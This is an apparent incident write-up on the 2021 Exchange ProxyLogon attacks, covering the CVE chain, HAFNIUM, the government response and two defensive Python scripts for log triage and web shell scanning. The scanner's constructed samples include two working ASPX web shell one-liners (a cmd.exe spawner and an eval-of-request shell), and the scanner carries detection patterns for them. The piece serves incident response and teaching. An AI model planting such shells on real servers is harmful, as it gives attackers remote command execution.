Exchange ProxyLogon: 250,000 Servers Backdoored Within Days via Email Server Zero-Days
Four zero-day vulnerabilities in Microsoft Exchange Server were exploited by a Chinese state-sponsored group before any patch existed. Once Microsoft shipped fixes, other actors piled on, and estimates of backdoored Exchange servers worldwide, including US defence contractors and infectious disease researchers, reached roughly 250,000 within days of public disclosure.
Background
Microsoft Exchange Server is among the most widely deployed email server products in enterprise environments worldwide. The ProxyLogon chain (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065) was found independently by DEVCORE, who reported it to Microsoft in early January 2021, and by Volexity, who observed it being exploited in the wild from the start of that month. The group Microsoft tracks as HAFNIUM, assessed to be Chinese state-sponsored, was already using it before a patch was available.
The Attack
ProxyLogon starts with CVE-2021-26855, a server-side request forgery in the Exchange Client Access (frontend) service. A crafted request to the frontend is proxied to backend endpoints such as Autodiscover, EWS and ECP with the server's own trust, so an attacker with no credentials reaches them as an authenticated user. From there, CVE-2021-27065 (and the closely related CVE-2021-26858), a post-authentication arbitrary file write, is triggered through the Exchange Control Panel: the attacker sets a virtual directory's ExternalUrl property to script content and has Exchange write the configuration out to an .aspx file in a web-served folder, leaving a web shell (a backdoor reachable over HTTPS) on the server. CVE-2021-26857, an insecure deserialization bug in the Unified Messaging service, gave a separate path to code execution as SYSTEM. HAFNIUM had used the chain since at least early January 2021 against infectious disease researchers, law firms, defence contractors and think tanks. Around the time Microsoft released patches on March 2, 2021, other state-sponsored and criminal groups adopted the technique and exploitation became indiscriminate; estimates of compromised Exchange servers reached roughly 250,000 within days.
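The CVE-2021-26855 stage leaves a recognisable trace in Exchange's HttpProxy logs: an unauthenticated request whose AnchorMailbox column starts with "ServerInfo~" and names a backend host and path, which legitimate clients never produce. The triage script below is an added example written for this page, not Microsoft's Test-ProxyLogon script or any vendor tool. Python is used so it runs anywhere the log files have been copied to. The sample log is constructed and uses a trimmed column set; real HttpProxy CSV files carry many more columns, but the '#Fields:' header line and the AnchorMailbox and BackEndCookie column names are the real ones.

```python
"""Triage Exchange HttpProxy logs for the CVE-2021-26855 SSRF indicator.

Added example for this page, not Microsoft's or Volexity's tooling. The
sample log is constructed and uses a trimmed column set; real HttpProxy
logs carry many more fields, but the '#Fields:' header line and the
AnchorMailbox / BackEndCookie column names are real.
"""
import csv
from collections import Counter

# Constructed sample. Rows r2 and r3 mimic the documented ProxyLogon signature:
# an unauthenticated request whose AnchorMailbox begins with "ServerInfo~" and
# points at a backend path. Rows r1, r4 and r5 are ordinary traffic.
SAMPLE_HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Log-type: HttpProxy Logs
#Fields: DateTime,RequestId,ClientIpAddress,UrlHost,UrlStem,AuthenticationType,IsAuthenticated,AnchorMailbox,BackEndCookie
2021-03-02T03:14:07.000Z,r1,203.0.113.10,mail.example.test,/owa/auth/logon.aspx,,false,,
2021-03-02T03:14:09.000Z,r2,203.0.113.10,mail.example.test,/ecp/y.js,,false,ServerInfo~localhost/autodiscover/autodiscover.xml?#,
2021-03-02T03:14:11.000Z,r3,203.0.113.10,mail.example.test,/ecp/y.js,,false,ServerInfo~exch01.example.test/mapi/emsmdb/?#,
2021-03-02T03:15:00.000Z,r4,198.51.100.7,mail.example.test,/owa/,Basic,true,SMTP:alice@example.test,Server~exch01.example.test~1941962753
2021-03-02T03:15:30.000Z,r5,198.51.100.7,mail.example.test,/ecp/DDI/DDIService.svc/SetObject,Negotiate,true,alice@example.test,
"""


def parse_httpproxy_log(text):
    """Yield each data row as a dict keyed by the names in the '#Fields:' header."""
    fields = None
    for row in csv.reader(text.splitlines()):
        if not row:
            continue
        if row[0].startswith('#Fields:'):
            # The first header cell is "#Fields: DateTime"; strip the prefix.
            fields = [row[0].split(':', 1)[1].strip()] + [c.strip() for c in row[1:]]
            continue
        if row[0].startswith('#') or fields is None:
            continue          # other comment lines, or data before any header
        yield dict(zip(fields, row))


def is_proxylogon_ssrf(row):
    """True when AnchorMailbox has the form ServerInfo~<host>/<backend path>."""
    anchor = row.get('AnchorMailbox', '')
    if not anchor.startswith('ServerInfo~'):
        return False
    return '/' in anchor[len('ServerInfo~'):]


def find_proxylogon_requests(text):
    """Return (suspicious rows, Counter of suspicious requests per client IP)."""
    hits = [row for row in parse_httpproxy_log(text) if is_proxylogon_ssrf(row)]
    by_ip = Counter(row['ClientIpAddress'] for row in hits)
    return hits, by_ip


if __name__ == '__main__':
    hits, by_ip = find_proxylogon_requests(SAMPLE_HTTPPROXY_LOG)
    for row in hits:
        print(row['DateTime'], row['ClientIpAddress'], row['UrlStem'], row['AnchorMailbox'])
    print('sources:', dict(by_ip))
```

On a real server, feed every file under `%ExchangeInstallPath%Logging\HttpProxy\` to `find_proxylogon_requests` and treat any hit as confirmed probing at minimum; the source IPs and timestamps then bound the window in which to look for dropped web shells.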
Response
Microsoft released out-of-band patches on March 2, 2021, together with public disclosure. CISA issued Emergency Directive 21-02 the next day, requiring federal agencies to hunt for compromise and to patch or disconnect vulnerable servers within days. Microsoft later published a one-click mitigation tool (the Exchange On-premises Mitigation Tool) for organisations that could not patch immediately. In April 2021 the FBI obtained a court order authorising it to remove web shells remotely from hundreds of infected US servers, an extraordinary legal step.
Outcome
Tens of thousands of organisations were still finding ProxyLogon web shells months later: patching closes the entry point but does nothing about what was already planted. The FBI's court-ordered remote remediation was controversial but legally unprecedented. In July 2021 the US, EU, NATO and allied governments formally attributed the campaign to China's Ministry of State Security, the broadest joint attribution of a Chinese cyber operation to date.
Key Takeaways
- Internet-facing email servers must be patched within hours of a critical disclosure; they are always a top target
- Web shells dropped during exploitation survive the patch, so patching alone is not remediation: scan web-served directories and HttpProxy/IIS logs for them
- A patch release (or, as here, the days before it) triggers mass exploitation; assume you will be attacked the day a patch ships
- The FBI's remote remediation of private companies' servers set a significant legal precedent for government cyber response
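The second takeaway above is only useful with something to run. The scanner below is an added example for this page, not Microsoft's EOMT or any vendor product. The directory layout and the heuristics are assumptions drawn from public ProxyLogon reporting (China Chopper-style one-liners written under inetpub's aspnet_client folder and under FrontEnd/HttpProxy/owa/auth); the sample files it builds in a temporary directory are constructed and are the same shape as, not copies of, reported samples. It flags any server-side script that evaluates request data, spawns a process, loads assemblies at runtime or writes files, and separately flags any .aspx under aspnet_client, which should hold only static client files.

```python
"""Scan Exchange web-served directories for ASPX web shells.

Added example for this page, not Microsoft's EOMT or any vendor scanner. The
layout and heuristics are assumptions taken from public ProxyLogon reporting
(shells under aspnet_client and FrontEnd/HttpProxy/owa/auth); the sample
files are constructed.
"""
import os
import re
import tempfile

# Heuristics: each (name, regex) pair is a behaviour that Exchange's own pages
# essentially never exhibit but web shells must.
PATTERNS = [
    ('eval-of-request', re.compile(r'eval\s*\(\s*Request', re.I)),
    ('process-spawn',   re.compile(r'Process(StartInfo)?\s*\(|Process\.Start|cmd\.exe', re.I)),
    ('assembly-load',   re.compile(r'Assembly\.Load|Activator\.CreateInstance', re.I)),
    ('request-to-file', re.compile(r'File\.Write|SaveAs\s*\(|new\s+FileStream', re.I)),
]
SCRIPT_TAG = re.compile(r'<script[^>]*runat\s*=\s*"server"', re.I)
CODE_BLOCK = re.compile(r'<%[^@]')   # inline code, not a <%@ Page %> directive
WEB_EXTENSIONS = ('.aspx', '.asp', '.ashx', '.asmx')


def classify_file(path):
    """Return the matched heuristic names for one file (empty list = clean)."""
    with open(path, 'r', encoding='utf-8', errors='replace') as fh:
        body = fh.read()
    if not (SCRIPT_TAG.search(body) or CODE_BLOCK.search(body)):
        return []          # no server-side code at all, nothing to execute
    return [name for name, rx in PATTERNS if rx.search(body)]


def scan_web_roots(root):
    """Walk `root`; return {relative_path: [reasons]} for every suspicious script."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            reasons = classify_file(full)
            # aspnet_client holds static client files; any .aspx there is
            # suspicious regardless of content.
            if 'aspnet_client' in os.path.normpath(full).split(os.sep):
                reasons.append('script-in-aspnet_client')
            if reasons:
                findings[os.path.relpath(full, root).replace(os.sep, '/')] = reasons
    return findings


# Constructed sample tree: one benign page, one legitimate inline-code page,
# a process-spawning shell, and a China Chopper-style eval shell.
SAMPLE_TREE = {
    'FrontEnd/HttpProxy/owa/auth/logon.aspx':
        '<%@ Page Language="C#" %>\n<html><body>Outlook sign-in</body></html>\n',
    'FrontEnd/HttpProxy/owa/auth/errorFF.aspx':
        '<%@ Page Language="C#" %>\n<% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %>\n',
    'wwwroot/aspnet_client/system_web/help.aspx':
        '<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>\n',
    'ClientAccess/ecp/default.aspx':
        '<%@ Page Language="C#" %>\n<% Response.Write(Request.QueryString["id"]); %>\n',
}


def run_demo():
    """Write the constructed tree to a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_TREE.items():
            full = os.path.join(tmp, *rel.split('/'))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, 'w', encoding='utf-8') as fh:
                fh.write(body)
        return scan_web_roots(tmp)


if __name__ == '__main__':
    for path, reasons in sorted(run_demo().items()):
        print(path, '->', ', '.join(reasons))
```

Point `scan_web_roots` at the Exchange install path and at `C:\inetpub\wwwroot` on a suspect server; compare every hit against file creation times from the exploitation window found in the HttpProxy logs, and treat a flagged file under aspnet_client or owa/auth as a compromise until proven otherwise rather than as a false positive to tune away.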